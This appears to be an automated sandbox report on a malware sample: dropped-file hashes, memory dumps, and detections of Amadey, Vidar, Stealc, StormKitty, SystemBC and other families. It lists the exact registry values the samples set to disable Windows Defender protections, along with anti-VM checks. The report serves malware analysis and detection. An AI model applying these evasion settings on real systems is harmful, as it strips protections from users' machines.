SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

memory/2092-421-0x0000000001390000-0x0000000001825000-memory.dmp

memory/2656-429-0x0000000001310000-0x000000000161A000-memory.dmp

memory/2092-430-0x0000000001390000-0x0000000001825000-memory.dmp

memory/1032-431-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108760101\d489e96a96.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/2644-445-0x00000000003F0000-0x00000000008B2000-memory.dmp

memory/1720-446-0x00000000013E0000-0x0000000001A68000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108770101\16cfb950e7.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/1032-461-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\db\data.safe.bin

MD5 7a8ddeb1652a2c311ee8e4388e24a486
SHA1 866cc30c425bffa933241eea6f974c25496bf8a3
SHA256 f0920695230591b60442a65c5664753b223ccb72ab7230d6b2916f6e0c47c72b
SHA512 b6c6d005d2ca9981e40b3513622f76ea9dfd20c1e1da7dbfbdf6689b3a9827acdff2d856fff9751f2ed32cc41c53bfe25490024fc6c7fcc001aab3b9ce2c936a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\datareporting\glean\pending_pings\e867b7f9-75ba-4d07-8cf6-ba499472fdad

MD5 b7963147bc998fa141cd5d003a0a151c
SHA1 84d0cdfa5e1d4c2c6892dab8d5cfa2aec886b54e
SHA256 ed6ed5eb8ff8ee2e7aff7ec5971cd61dbe08bf14bab077a69cf0fbd2914121bb
SHA512 6367110adec72d065a21faa5c0ae0d1cdbb8d33c02a24ca220e9a718b78e5c69c30514e2b7ca832de56f1d0284eb1cc935270cc44511f75503a9af1443276d69

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xmhyv50e.default-release\activity-stream.discovery_stream.json.tmp

MD5 80769e9de709814ad1583c7fc2d7fc22
SHA1 a03594257648cb63c8f1bbb3b894c27975c11290
SHA256 2dc822a7c9701bd1c45c6861aed9b2e9cbb3d55aaa1984976c71b8b6e309af49
SHA512 5a7c7037c5a97c82416adf2c382d33e35fdc9c364ff89528ff9bcf67c9c9361c03f60267baeb8f0ac20d3fa928837f5363c91cdf7b1d83e019056bb7a51a3fc4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\xmhyv50e.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

MD5 96c542dec016d9ec1ecc4dddfcbaac66
SHA1 6199f7648bb744efa58acf7b96fee85d938389e4
SHA256 7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512 cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs.js

MD5 acf8ea173c1fc9802edb1aa9459a34c0
SHA1 8df416996c885a28d7bb741222faece76bced754
SHA256 eda61e753c9e3df652a38a06412a3d70624afcbd9dc2bb49b954b32e07e4d641
SHA512 50793e1e02d9fb00c647c73af06717c05ad2ba5519083044931087d351ba622494ed96d37608199a6fb341157af8ab4b61e910801e5ba3d2d16b9170588fe58b

memory/2644-569-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5GWW47WY\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

MD5 640da0b1620d5e908aea2d55345f8967
SHA1 d76a5ef769fa4ef4d1aa8f04b39a0bfa2dba8d01
SHA256 8644af879e1ae0cbaa028868866ce24e0e0da399139141696e7a5f178167cb11
SHA512 359d61612a7cb970b25d5d67b3a4f63f5290ae5d72dc967c28e8ea79c367a14d7f4f7db96401abedee0c4ad66d52c4cc305be3fa2d54bd4fabb91801bb553482

C:\Users\Admin\AppData\Local\Temp\10108780101\b3530bb0e7.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/3380-618-0x0000000000270000-0x00000000006BE000-memory.dmp

memory/3380-617-0x0000000000270000-0x00000000006BE000-memory.dmp

memory/3980-635-0x0000000000BD0000-0x0000000000C54000-memory.dmp

memory/1032-636-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2644-695-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\sessionstore-backups\recovery.jsonlz4

MD5 9369055d287dda7a84bc27643418f6c4
SHA1 f7ae356b73064868bb35fdc7cf75a657812a2add
SHA256 762449167ef3ce828a7eeab07de9eafc505b51fe8f167be434a2ecd5bea9a096
SHA512 3088ba51eae1a0ad8a04fbe244726b3af3e54043b476e74e80974db7e733c6b68c0480a2cfad1f12f5540fbc5f33511b23dad9602dec96522d82976bdef5da6e

memory/1032-716-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2644-717-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

MD5 d65a67f7dd6e448ea5a1e361e3f265d5
SHA1 f608d14b30c0923e25f0b4971073a28f95f05e29
SHA256 0f38fa7f2b3fb8cdc542fdd330fc2b0a9df59675b056f2d4634a9800a7fc868a
SHA512 640b09a02bcd5d5c88e342977bed1a6054e103102e85f1d1242d1b5c52d183672be385c18e8b6a6465378f6b5ae6366e3871a272d15082ff98d6dfb534c381b2

C:\Users\Admin\AppData\Local\Temp\10108810101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

memory/1032-804-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xmhyv50e.default-release\prefs-1.js

MD5 e53fdfb8c13ff81aa5eb41ced4627f87
SHA1 1f6d194b9741a95c0567fe9e910815f32f04122a
SHA256 28bc6794d84695f4331446df4bc335e3c1c15773541928eb33cfff30b7c872e2
SHA512 f5f399e1cdc500766b0791f4b61aa061265a06f3665aff3acaae5c429bc818423a43c10b3506b3a1c18dc3adeebfdf0487a169c42555efc0714b11318fe8480a

memory/2644-830-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108830101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/4008-844-0x0000000000F40000-0x0000000000FA0000-memory.dmp

memory/3260-864-0x0000000000400000-0x0000000000429000-memory.dmp

C:\ProgramData\2572E4B832ECD5F2.dat

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\10108840101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2640-902-0x0000000000A40000-0x0000000000A52000-memory.dmp

memory/2640-903-0x00000000003C0000-0x00000000003D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108850101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 01:16

Reported

2025-03-06 01:18

Platform

win10v2004-20250217-en

Max time kernel

140s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8d69e64b83a54089dcbf55a2aa726a905040428c9b5ad0ffc53876256640e18c.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A

Stealc

stealer stealc

Stealc family

stealc

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stormkitty family

stormkitty

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108730101\39510de4d4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\QLW5JVNEJIJD4BSUTO.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108740101\5a2f7a55bb.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108750101\32376a73b4.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108780101\972bad5e2c.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108820101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10108760101\eefeac8dd1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp8KPPGOPIY9TNQQOPJI0SJEJBCDGVMLZP.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10108710101\cfaa592634.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
